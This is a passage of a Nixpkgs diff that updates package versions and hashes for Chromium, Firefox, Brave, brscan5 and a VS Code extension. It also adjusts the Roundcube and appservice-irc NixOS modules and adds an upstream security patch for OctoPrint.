diff options
77 files changed, 1338 insertions, 1152 deletions
diff --git a/nixos/modules/services/mail/roundcube.nix b/nixos/modules/services/mail/roundcube.nix index 4e29f567ed92c..fc4f562cb698d 100644 --- a/nixos/modules/services/mail/roundcube.nix +++ b/nixos/modules/services/mail/roundcube.nix @@ -239,13 +239,14 @@ in (mkIf (cfg.database.host == "localhost") { requires = [ "postgresql.service" ]; after = [ "postgresql.service" ]; - path = [ config.services.postgresql.package ]; }) { after = [ "network-online.target" ]; wantedBy = [ "multi-user.target" ]; + + path = [ config.services.postgresql.package ]; script = let - psql = "${lib.optionalString (!localDB) "PGPASSFILE=${cfg.database.passwordFile}"} ${pkgs.postgresql}/bin/psql ${lib.optionalString (!localDB) "-h ${cfg.database.host} -U ${cfg.database.username} "} ${cfg.database.dbname}"; + psql = "${lib.optionalString (!localDB) "PGPASSFILE=${cfg.database.passwordFile}"} psql ${lib.optionalString (!localDB) "-h ${cfg.database.host} -U ${cfg.database.username} "} ${cfg.database.dbname}"; in '' version="$(${psql} -t <<< "select value from system where name = 'roundcube-version';" || true)" diff --git a/nixos/modules/services/matrix/appservice-irc.nix b/nixos/modules/services/matrix/appservice-irc.nix index c79cd799b4d0e..ed15641e37107 100644 --- a/nixos/modules/services/matrix/appservice-irc.nix +++ b/nixos/modules/services/matrix/appservice-irc.nix @@ -214,8 +214,9 @@ in { RestrictRealtime = true; PrivateMounts = true; SystemCallFilter = [ - "@system-service @pkey @chown" + "@system-service @pkey" "~@privileged @resources" + "@chown" ]; SystemCallArchitectures = "native"; # AF_UNIX is required to connect to a postgres socket. diff --git a/pkgs/applications/editors/vscode/extensions/default.nix b/pkgs/applications/editors/vscode/extensions/default.nix index ce738de9174c9..4fd7c8ced5e0a 100644 --- a/pkgs/applications/editors/vscode/extensions/default.nix +++ b/pkgs/applications/editors/vscode/extensions/default.nix @@ -930,8 +930,8 @@ let mktplcRef = { name = "vscode-markdownlint"; publisher = "DavidAnson"; - version = "0.54.0"; - sha256 = "sha256-BrPFFRspJIz1U08hPbLziCmRUeZv2NhRrTCx6qvhOJw="; + version = "0.55.0"; + hash = "sha256-slfHfRPcuRu+649n6kAr2bv9H6J+DvYVN/ysq1QpPQM="; }; meta = { changelog = "https://marketplace.visualstudio.com/items/DavidAnson.vscode-markdownlint/changelog"; diff --git a/pkgs/applications/graphics/sane/backends/brscan5/default.nix b/pkgs/applications/graphics/sane/backends/brscan5/default.nix index 7bce5301f938a..c15599ec66bbb 100644 --- a/pkgs/applications/graphics/sane/backends/brscan5/default.nix +++ b/pkgs/applications/graphics/sane/backends/brscan5/default.nix @@ -10,15 +10,15 @@ let in stdenv.mkDerivation rec { pname = "brscan5"; - version = "1.3.0-0"; + version = "1.3.1-0"; src = { "i686-linux" = fetchurl { url = "https://download.brother.com/welcome/dlf104034/${pname}-${version}.i386.deb"; - sha256 = "sha256-LpbPUo8iD5CcwUoIOa1UYHQXMrZZJ7PjZpcuyXhXjzk="; + hash = "sha256-BgS64vwsKESJBDz9H2MDwcGiresROSNFP1b+7+zlE5c="; }; "x86_64-linux" = fetchurl { url = "https://download.brother.com/welcome/dlf104033/${pname}-${version}.amd64.deb"; - sha256 = "sha256-ntVe/e6/cdz3+LSpGilMFZecxfv74pd7ksh85SzEdKc="; + hash = "sha256-0UMbXMBlyiZI90WG5FWEP2mIZEBsxXd11dtgtyuSDnY="; }; }."${system}" or (throw "Unsupported system: ${system}"); @@ -33,9 +33,12 @@ stdenv.mkDerivation rec { postPatch = let + # Download .deb for both amd64 and i386, then unpack like unpackPhase + # to get the offset, run: + # strings -n 10 --radix=d opt/brother/scanner/brscan5/libsane-brother5.so.1.0.7 | grep "/opt/brother/scanner/brscan5/models" patchOffsetBytes = - if system == "x86_64-linux" then 86528 - else if system == "i686-linux" then 79140 + if system == "x86_64-linux" then 86592 + else if system == "i686-linux" then 79236 else throw "Unsupported system: ${system}"; in '' diff --git a/pkgs/applications/misc/octoprint/default.nix b/pkgs/applications/misc/octoprint/default.nix index e7daa60198d11..6920a8f3bbbe3 100644 --- a/pkgs/applications/misc/octoprint/default.nix +++ b/pkgs/applications/misc/octoprint/default.nix @@ -4,6 +4,7 @@ , lib , fetchFromGitHub , fetchPypi +, fetchpatch , python3 , substituteAll , nix-update-script @@ -188,6 +189,13 @@ let src = ./ffmpeg-path.patch; ffmpeg = "${pkgs.ffmpeg}/bin/ffmpeg"; }) + + (fetchpatch { + # https://github.com/OctoPrint/OctoPrint/security/advisories/GHSA-x7mf-wrh9-r76c + name = "CVE-2024-28237.patch"; + url = "https://github.com/OctoPrint/OctoPrint/commit/779894c1bc6478332d14bc9ed1006df1354eb517.patch"; + hash = "sha256-JtZSEbzkvVl1yz1fjJN1BCVIRSx3ZiLsj01dh+xchyM="; + }) ]; postPatch = diff --git a/pkgs/applications/networking/browsers/brave/default.nix b/pkgs/applications/networking/browsers/brave/default.nix index 25fe2f3f7a93b..3e77fb1bf6402 100644 --- a/pkgs/applications/networking/browsers/brave/default.nix +++ b/pkgs/applications/networking/browsers/brave/default.nix @@ -92,11 +92,11 @@ in stdenv.mkDerivation rec { pname = "brave"; - version = "1.64.113"; + version = "1.65.122"; src = fetchurl { url = "https://github.com/brave/brave-browser/releases/download/v${version}/brave-browser_${version}_amd64.deb"; - hash = "sha256-T0uVq1yxDXNi6x9ot5bs3NRaOQ+RwBThvULS6EZ+Bdg="; + hash = "sha256-zhRH/EG+8Qx9B2Gm5n9DYVwheyfiqIBwyYygART5b6A="; }; dontConfigure = true; diff --git a/pkgs/applications/networking/browsers/chromium/upstream-info.nix b/pkgs/applications/networking/browsers/chromium/upstream-info.nix index 76825427b8950..c3ef4848ee44e 100644 --- a/pkgs/applications/networking/browsers/chromium/upstream-info.nix +++ b/pkgs/applications/networking/browsers/chromium/upstream-info.nix @@ -1,11 +1,11 @@ { stable = { chromedriver = { - hash_darwin = "sha256-PmLV++FK6aCvdhNNhb2ZAmRLumr+VRFvN+7IByieEZk="; + hash_darwin = "sha256-RGOChK4JhrFUgVY/5YqgE0KFLRl6a7X2llw1ZfhiPXY="; hash_darwin_aarch64 = - "sha256-6Ys1EMSLmJNNaWdPeQiCT+bC0H7ABInVNzwXorGavn4="; - hash_linux = "sha256-iimq37dcEcY2suW73a6lhgHuNaoqtzbAZCHkQP9ro/Y="; - version = "123.0.6312.122"; + "sha256-K1jFXmWtXrS43UJg2mQ39Kae6tv7E9Fxm6LUWg+uwLo="; + hash_linux = "sha256-xwaRNh7sllyNaq8+aLAZDQ3uDg06cu3KYqc02LWPSyw="; + version = "124.0.6367.91"; }; deps = { gn = { @@ -15,9 +15,9 @@ version = "2024-03-14"; }; }; - hash = "sha256-apEniFKhIxPo4nhp9gCU+WpiV/EB40qif4RfE7Uniog="; - hash_deb_amd64 = "sha256-rSbigG5/xbL32d1ntOn6gnZyxSpgrg1h7lb/RD4YROI="; - version = "124.0.6367.60"; + hash = "sha256-tajZtdiXgs5lRLTmDmgNTM2vD+N+LuWpBS0dYzxUsMA="; + hash_deb_amd64 = "sha256-CyCbZQ5ce8WLTt2JVSqbDkLDboE4BloiZ8pJff3dmSY="; + version = "124.0.6367.91"; }; ungoogled-chromium = { deps = { @@ -28,12 +28,12 @@ version = "2024-03-14"; }; ungoogled-patches = { - hash = "sha256-zgkt0stU/H5Mji429tigVbjOq27Op8UppHTjG6neoeA="; - rev = "124.0.6367.60-1"; + hash = "sha256-1/J3BhUlef8CH/jZ5P5fWGXnWxTiuB0Ep+AWrMrv9cE="; + rev = "124.0.6367.91-1"; }; }; - hash = "sha256-apEniFKhIxPo4nhp9gCU+WpiV/EB40qif4RfE7Uniog="; - hash_deb_amd64 = "sha256-rSbigG5/xbL32d1ntOn6gnZyxSpgrg1h7lb/RD4YROI="; - version = "124.0.6367.60"; + hash = "sha256-tajZtdiXgs5lRLTmDmgNTM2vD+N+LuWpBS0dYzxUsMA="; + hash_deb_amd64 = "sha256-CyCbZQ5ce8WLTt2JVSqbDkLDboE4BloiZ8pJff3dmSY="; + version = "124.0.6367.91"; }; } diff --git a/pkgs/applications/networking/browsers/firefox-bin/release_sources.nix b/pkgs/applications/networking/browsers/firefox-bin/release_sources.nix index 60be29607787b..3f53923897578 100644 --- a/pkgs/applications/networking/browsers/firefox-bin/release_sources.nix +++ b/pkgs/applications/networking/browsers/firefox-bin/release_sources.nix @@ -1,1025 +1,1025 @@ { - version = "125.0.2"; + version = "125.0.3"; sources = [ - { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.2/linux-x86_64/ach/firefox-125.0.2.tar.bz2"; + { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.3/linux-x86_64/ach/firefox-125.0.3.tar.bz2"; locale = "ach"; arch = "linux-x86_64"; - sha256 = "c1e0c0a2c0d8604408c1a6deef3619afdee63e3ec6ed2a372b620eaf69becae8"; + sha256 = "1811a9f5618f725b80dbda41568985c051b987dca7c2e207a039668a0d48d42d"; } - { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.2/linux-x86_64/af/firefox-125.0.2.tar.bz2"; + { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.3/linux-x86_64/af/firefox-125.0.3.tar.bz2"; locale = "af"; arch = "linux-x86_64"; - sha256 = "eb3a8dda25571e621e8b4b44e521f514bf9dc42341d6658212c05b35854d311e"; + sha256 = "5cca7823582d1be336a25278d02bad75d77f37111b43b56e4168b61edab8986a"; } - { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.2/linux-x86_64/an/firefox-125.0.2.tar.bz2"; + { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.3/linux-x86_64/an/firefox-125.0.3.tar.bz2"; locale = "an"; arch = "linux-x86_64"; - sha256 = "592d708dcfff3902a3a07d20d43927f43126a82ee8fb17e15841454aee490b48"; + sha256 = "d38de568b16d3553402dac58f11c494b0e093523d74c20fcaad172fd87d41ad3"; } - { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.2/linux-x86_64/ar/firefox-125.0.2.tar.bz2"; + { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.3/linux-x86_64/ar/firefox-125.0.3.tar.bz2"; locale = "ar"; arch = "linux-x86_64"; - sha256 = "f9111fb9b0fcfd44e8dac53e714f44512a4738077eece31c542b9013e1d05e96"; + sha256 = "9c643e7791c50c99a8e983e972ff721955af638c2d24a6421e82b0a7dd66f68d"; } - { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.2/linux-x86_64/ast/firefox-125.0.2.tar.bz2"; + { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.3/linux-x86_64/ast/firefox-125.0.3.tar.bz2"; locale = "ast"; arch = "linux-x86_64"; - sha256 = "f7eb76354add218b6fe8c30cd3a61c30ffbe4fb9a80d27c5d16420c0e61e79d8"; + sha256 = "7cb20ed5898279ef7f96aa33ff931438b553f964d12d94ffaee1925b9523c8cc"; } - { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.2/linux-x86_64/az/firefox-125.0.2.tar.bz2"; + { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.3/linux-x86_64/az/firefox-125.0.3.tar.bz2"; locale = "az"; arch = "linux-x86_64"; - sha256 = "8745fb82e0807bf888a6cce399cbb7700d7b720123ce4a6972caff5ccb677c67"; + sha256 = "1ae2d85a6bb4dbcefd0cd518af75614cce6af43c641c49dbfe7c4bacef6691d7"; } - { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.2/linux-x86_64/be/firefox-125.0.2.tar.bz2"; + { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.3/linux-x86_64/be/firefox-125.0.3.tar.bz2"; locale = "be"; arch = "linux-x86_64"; - sha256 = "d6725d8fe67b309058dfcf33951619e0f0b57b05e8dcdbf3d5f9462e3c903684"; + sha256 = "84d7aed6ac1f46390b378ce432ecc00723a70caf5b34e33adac9449fb704ebf9"; } - { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.2/linux-x86_64/bg/firefox-125.0.2.tar.bz2"; + { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.3/linux-x86_64/bg/firefox-125.0.3.tar.bz2"; locale = "bg"; arch = "linux-x86_64"; - sha256 = "c66ec00ce77d7c0743c0ac98029b064b4cf21d70ff3b1f07b7611e60a4e9b575"; + sha256 = "9071fc64447f3772c88469385eef3fcc1f36188628c18b929ba1320b4bc01d1f"; } - { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.2/linux-x86_64/bn/firefox-125.0.2.tar.bz2"; + { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.3/linux-x86_64/bn/firefox-125.0.3.tar.bz2"; locale = "bn"; arch = "linux-x86_64"; - sha256 = "9cf7401bf5fc8be7cf30e3dbcd97fc51c8a8948f3ab31d9d311fc5dccd2628d2"; + sha256 = "c8ccaf292b17f5d89b9c7af28b79a5a9d5edc53d3a7cff92be8cfb5166481ba4"; } - { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.2/linux-x86_64/br/firefox-125.0.2.tar.bz2"; + { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.3/linux-x86_64/br/firefox-125.0.3.tar.bz2"; locale = "br"; arch = "linux-x86_64"; - sha256 = "6648ecdfc1e7931caff9e3cb2fec9984d83a1f1b5298f3ea0f72b0bbfdb2abcb"; + sha256 = "4cae7d705d2161603b35dcdfb2cd92c3a80922bba95bdc3f5945a59a1b19a011"; } - { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.2/linux-x86_64/bs/firefox-125.0.2.tar.bz2"; + { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.3/linux-x86_64/bs/firefox-125.0.3.tar.bz2"; locale = "bs"; arch = "linux-x86_64"; - sha256 = "f2892526f0fa826666549bbf7412c0ad42a4bc74841a3c3c53f1965c24246f54"; + sha256 = "cb74e00873abd0466c97f500ff5de4ab914beb7e0714f8f07ad7f72eeb300013"; } - { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.2/linux-x86_64/ca-valencia/firefox-125.0.2.tar.bz2"; + { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.3/linux-x86_64/ca-valencia/firefox-125.0.3.tar.bz2"; locale = "ca-valencia"; arch = "linux-x86_64"; - sha256 = "0ba73ee9bb67921fa1ab4ede7c8803a50e1f9991de703a0b0340d6d95e62b906"; + sha256 = "2995878a5d1b127fa68fdc196f74c4173b14d48e13bfeb28252515ace585ceb4"; } - { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.2/linux-x86_64/ca/firefox-125.0.2.tar.bz2"; + { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.3/linux-x86_64/ca/firefox-125.0.3.tar.bz2"; locale = "ca"; arch = "linux-x86_64"; - sha256 = "445306c9e98bdf82942560d91b367fa623641c860531531e47062956bb12d944"; + sha256 = "47180f3814da29da56848baf7f050184face647f42f2e0b6dac9d9979979028d"; } - { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.2/linux-x86_64/cak/firefox-125.0.2.tar.bz2"; + { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.3/linux-x86_64/cak/firefox-125.0.3.tar.bz2"; locale = "cak"; arch = "linux-x86_64"; - sha256 = "b008e29144aaea98bb7617903df3d99af922482d03ff45d0079daf68977b44f8"; + sha256 = "ab400636a09114d9b79a42a375aa2eefeef0e191aa69aa0ee12ee2caaf5e72f1"; } - { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.2/linux-x86_64/cs/firefox-125.0.2.tar.bz2"; + { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.3/linux-x86_64/cs/firefox-125.0.3.tar.bz2"; locale = "cs"; arch = "linux-x86_64"; - sha256 = "60eddd9dd435f828416c8612d42b64cde2d095a29dd0e38112a1467aae211797"; + sha256 = "5506a162fbde8afa5e255a657b87c840202d5d02784e6a78ac68c02a1affdbfd"; } - { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.2/linux-x86_64/cy/firefox-125.0.2.tar.bz2"; + { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.3/linux-x86_64/cy/firefox-125.0.3.tar.bz2"; locale = "cy"; arch = "linux-x86_64"; - sha256 = "b01de57e45b6d6c887a7c0caed9681a59799bf8864d6a30d999622c64758518e"; + sha256 = "5dc8e2177e509c4f5d971b89c6b95b89a2d33d2bfdcc70533bc226d41d2b28cc"; } - { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.2/linux-x86_64/da/firefox-125.0.2.tar.bz2"; + { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.3/linux-x86_64/da/firefox-125.0.3.tar.bz2"; locale = "da"; arch = "linux-x86_64"; - sha256 = "1d855f06c7967a4ffbace2f65b14290a4cb9cfd59bd57660c6f98697d897a982"; + sha256 = "d8ca13cba46ddb0ba0f10d99ebac9f75da7e9ee5b3858b50315d0f3212d86ef0"; } - { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.2/linux-x86_64/de/firefox-125.0.2.tar.bz2"; + { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.3/linux-x86_64/de/firefox-125.0.3.tar.bz2"; locale = "de"; arch = "linux-x86_64"; - sha256 = "88bf1866dcb4afd25cfa55f67e316f09d75ddda0012ba8d2188183c72e55f83f"; + sha256 = "74aec53ca8eccfa25fa1925a1d26323d481c7b0457fbde0be32eb4210e8daea9"; } - { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.2/linux-x86_64/dsb/firefox-125.0.2.tar.bz2"; + { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.3/linux-x86_64/dsb/firefox-125.0.3.tar.bz2"; locale = "dsb"; arch = "linux-x86_64"; - sha256 = "0637ff08956b7c76f36f8f3e7f3811acb3f8dc36a3948b9d318dd3330ba75148"; + sha256 = "f6725093e244d296bcb048998ed9bcb70dd58a9864e45f28bfa5cd833e265c1d"; } - { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.2/linux-x86_64/el/firefox-125.0.2.tar.bz2"; + { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.3/linux-x86_64/el/firefox-125.0.3.tar.bz2"; locale = "el"; arch = "linux-x86_64"; - sha256 = "805d626a871401ae319f98f0cd0809ce4718d6c5511d521e8d15479a5bcf2469"; + sha256 = "9cadc42340a199d5f5744d55dcd403584cf06e7853be6d6a030767ca5590a872"; } - { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.2/linux-x86_64/en-CA/firefox-125.0.2.tar.bz2"; + { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.3/linux-x86_64/en-CA/firefox-125.0.3.tar.bz2"; locale = "en-CA"; arch = "linux-x86_64"; - sha256 = "f0f564282dfd392ee25fef3fe0e6a2057cc3d1490a0c63834cb9e066bc4324ce"; + sha256 = "02e518fb52863d60edeb31e5b21e77eb15a153e7058d23757eb4c8902edc10e1"; } - { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.2/linux-x86_64/en-GB/firefox-125.0.2.tar.bz2"; + { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.3/linux-x86_64/en-GB/firefox-125.0.3.tar.bz2"; locale = "en-GB"; arch = "linux-x86_64"; - sha256 = "c869f6573e388c13650b1103f0d445be8e96c9b1cec4723d53e544669138af1e"; + sha256 = "ea6539089c86b53df22c02179a8988a0ca66b854ceca5d2aa8ff6885d9bbc7b7"; } - { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.2/linux-x86_64/en-US/firefox-125.0.2.tar.bz2"; + { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.3/linux-x86_64/en-US/firefox-125.0.3.tar.bz2"; locale = "en-US"; arch = "linux-x86_64"; - sha256 = "ecd3d99be21bc2c3afb6f1a89fc587adb3dcd2a4ef22f95350d461f86251ae7b"; + sha256 = "2fb91b8dd196a8ee47238d82d6b7afef3dd1bb3212b29122ab1c3897052d8a49"; } - { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.2/linux-x86_64/eo/firefox-125.0.2.tar.bz2"; + { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.3/linux-x86_64/eo/firefox-125.0.3.tar.bz2"; locale = "eo"; arch = "linux-x86_64"; - sha256 = "9aa8fd5f10d5464f7d3fd15aab706848dcc8885dacb5c3de9401c8ff23d7ba46"; + sha256 = "3ffa103c2a31f729d7e38637762a8e8e9885fadd819afbe2448db795519ae239"; } - { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.2/linux-x86_64/es-AR/firefox-125.0.2.tar.bz2"; + { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.3/linux-x86_64/es-AR/firefox-125.0.3.tar.bz2"; locale = "es-AR"; arch = "linux-x86_64"; - sha256 = "ae54789a38235c25f7147b61b661f552f109afbb2f21027392bbf14bc30d3790"; + sha256 = "6f03108c3500c4328f074477bb6dbf303d9ec4c654afa7acc109407fe1682787"; } - { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.2/linux-x86_64/es-CL/firefox-125.0.2.tar.bz2"; + { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.3/linux-x86_64/es-CL/firefox-125.0.3.tar.bz2"; locale = "es-CL"; arch = "linux-x86_64"; - sha256 = "7624f5b01d859f6017f57b2913681b7c0ad92fecedb86a5a5282e172ee108afc"; + sha256 = "630476e38a0f9119f794933dea000c591687f13be94693917e457f8dfa8dca52"; } - { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.2/linux-x86_64/es-ES/firefox-125.0.2.tar.bz2"; + { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.3/linux-x86_64/es-ES/firefox-125.0.3.tar.bz2"; locale = "es-ES"; arch = "linux-x86_64"; - sha256 = "af56a3bda1dcc4be8dd16418be567c47625ae1880026d5e3bb35550352e50b45"; + sha256 = "87603bce7aac62d12725b922b74d6376365074c110dfaf01706dc0b31c05a9ff"; } - { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.2/linux-x86_64/es-MX/firefox-125.0.2.tar.bz2"; + { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.3/linux-x86_64/es-MX/firefox-125.0.3.tar.bz2"; locale = "es-MX"; arch = "linux-x86_64"; - sha256 = "e488a67b04e315f8e924b423e5a0f6779952737a057ed8f8e3cdd3b29bce02d9"; + sha256 = "ddfa1aa04be68932659439d93bb61de2ab0542f04677808eaa91f12e6e72714a"; } - { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.2/linux-x86_64/et/firefox-125.0.2.tar.bz2"; + { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.3/linux-x86_64/et/firefox-125.0.3.tar.bz2"; locale = "et"; arch = "linux-x86_64"; - sha256 = "3083bd8c49fae0155b7dc607bf176263998fe9926e4a3c2bc2d8a380190b37a7"; + sha256 = "817596c186d4f8aaf51434b7abbe63b06256987b9187fc28cada01977574baa3"; } - { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.2/linux-x86_64/eu/firefox-125.0.2.tar.bz2"; + { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.3/linux-x86_64/eu/firefox-125.0.3.tar.bz2"; locale = "eu"; arch = "linux-x86_64"; - sha256 = "cdf4f8928fd7c9a8ae55ef5fb0bf90667f19a77ebdd04d9cf1a15a70b07b67b5"; + sha256 = "f49aa967f260c08f8af7da05d57580e4c0e0804cc36bf6f702bca849cf8754c2"; } - { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.2/linux-x86_64/fa/firefox-125.0.2.tar.bz2"; + { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.3/linux-x86_64/fa/firefox-125.0.3.tar.bz2"; locale = "fa"; arch = "linux-x86_64"; - sha256 = "bb77300367b2a59defc1ca8cdd2754398f5d5a669cf77dbe4b6ba96656d221ab"; + sha256 = "d770af123d38d3dec2d5a35537b0f4bed9d980be810f12e5036cf665e93dac56"; } - { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.2/linux-x86_64/ff/firefox-125.0.2.tar.bz2"; + { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.3/linux-x86_64/ff/firefox-125.0.3.tar.bz2"; locale = "ff"; arch = "linux-x86_64"; - sha256 = "526daa29ae65ba57fefe639c5b18d140fad7bd04093071e4b7513937bc39486d"; + sha256 = "70f1e5026f00ecea44209a88239ba3ea68d5f10cccc8ed20cd4de2bd0194c7f2"; } - { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.2/linux-x86_64/fi/firefox-125.0.2.tar.bz2"; + { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.3/linux-x86_64/fi/firefox-125.0.3.tar.bz2"; locale = "fi"; arch = "linux-x86_64"; - sha256 = "c642f7803b2f9aace0ecc500c3664ba7209c1ab4fc7f7c3bf62a4f368f5097bb"; + sha256 = "9ecc9c29c701d3b2e298e191cec6f1764168e6831c9fa9472a82d15b2b29a169"; } - { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.2/linux-x86_64/fr/firefox-125.0.2.tar.bz2"; + { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.3/linux-x86_64/fr/firefox-125.0.3.tar.bz2"; locale = "fr"; arch = "linux-x86_64"; - sha256 = "32345e02fb215813bab7c689d95138e6a93f4937345e75b4cc01bdbb9c607de2"; + sha256 = "07d5f4dbba19bc643a995dc6cd06456cab9342ab2563c0274ac742d02c7aa674"; } - { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.2/linux-x86_64/fur/firefox-125.0.2.tar.bz2"; + { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.3/linux-x86_64/fur/firefox-125.0.3.tar.bz2"; locale = "fur"; arch = "linux-x86_64"; - sha256 = "24ad3d7a2877aff268ff03c6ac08e0d0005accc1c22dc50d48fe7740f083f3d5"; + sha256 = "707d814ea0ea3a7c5c5455f678e496e4b0b14fcdd6872e81b5fc82241cb2b12f"; } - { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.2/linux-x86_64/fy-NL/firefox-125.0.2.tar.bz2"; + { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.3/linux-x86_64/fy-NL/firefox-125.0.3.tar.bz2"; locale = "fy-NL"; arch = "linux-x86_64"; - sha256 = "4b11a2d6372e4ad66375681491abc94075ef05a8009f4adbe7a81762029ab5ae"; + sha256 = "3fea1cf498eb47c4038b6a76a61e37d5d354f2457fc5a9198e5943df227aaa09"; } - { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.2/linux-x86_64/ga-IE/firefox-125.0.2.tar.bz2"; + { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.3/linux-x86_64/ga-IE/firefox-125.0.3.tar.bz2"; locale = "ga-IE"; arch = "linux-x86_64"; - sha256 = "7bc49b1edb7300b362264c212076d7f75e7fd3feed8ab12dc5bc4b4ec3022c78"; + sha256 = "8790df138ec92eb83891a7f5ae575c63e181041cb06a24789ec347411c948c40"; } - { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.2/linux-x86_64/gd/firefox-125.0.2.tar.bz2"; + { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.3/linux-x86_64/gd/firefox-125.0.3.tar.bz2"; locale = "gd"; arch = "linux-x86_64"; - sha256 = "4d2ae49ae50da5e093426220dcb5ff8e6e007503fd5526f4acd498b31c9770b2"; + sha256 = "b2de6dfb77b655befa785938da00cb71da490ca88fe01d568e86bd037faeabef"; } - { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.2/linux-x86_64/gl/firefox-125.0.2.tar.bz2"; + { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.3/linux-x86_64/gl/firefox-125.0.3.tar.bz2"; locale = "gl"; arch = "linux-x86_64"; - sha256 = "1a349bb943eea8eada319a3fd42ebb258664fbcf410dd7ee3bb3552200043b80"; + sha256 = "15ac0bb2b9d61dcbb81243954123d79a0025d480fd66e1703ad1906c3ca09c28"; } - { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.2/linux-x86_64/gn/firefox-125.0.2.tar.bz2"; + { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.3/linux-x86_64/gn/firefox-125.0.3.tar.bz2"; locale = "gn"; arch = "linux-x86_64"; - sha256 = "4683096c6963ae79480829f2bcfc24346cfb0ff89554b1de2237c2926f2f6402"; + sha256 = "5c6e43ab908a99692b9702531b8639d8f503d3396c51e4c3f8a12f5e143bed26"; } - { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.2/linux-x86_64/gu-IN/firefox-125.0.2.tar.bz2"; + { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.3/linux-x86_64/gu-IN/firefox-125.0.3.tar.bz2"; locale = "gu-IN"; arch = "linux-x86_64"; - sha256 = "ce3ccfeccc8626d78b6ca5119d907960d7b415a4f6eb0cb1e8b1ce697234c9f4"; + sha256 = "0a140f0beb0112b88c058bd8d4d4fc8990c6146c60def24f4c15bb85daadd164"; } - { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.2/linux-x86_64/he/firefox-125.0.2.tar.bz2"; + { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.3/linux-x86_64/he/firefox-125.0.3.tar.bz2"; locale = "he"; arch = "linux-x86_64"; - sha256 = "6319f2446945e15aa2918b45236d57690e3b4ceed65a847915d92f228eef4f10"; + sha256 = "ce9251aee641a5a4c1cd2a55ac8c7f8d33ea444a746ec5eb783b6d7a5ab4735a"; } - { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.2/linux-x86_64/hi-IN/firefox-125.0.2.tar.bz2"; + { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.3/linux-x86_64/hi-IN/firefox-125.0.3.tar.bz2"; locale = "hi-IN"; arch = "linux-x86_64"; - sha256 = "fb6848985b5c27d80eca2c8c6b877ca287c095d3b9319bee5ba4b72dbf5e00ca"; + sha256 = 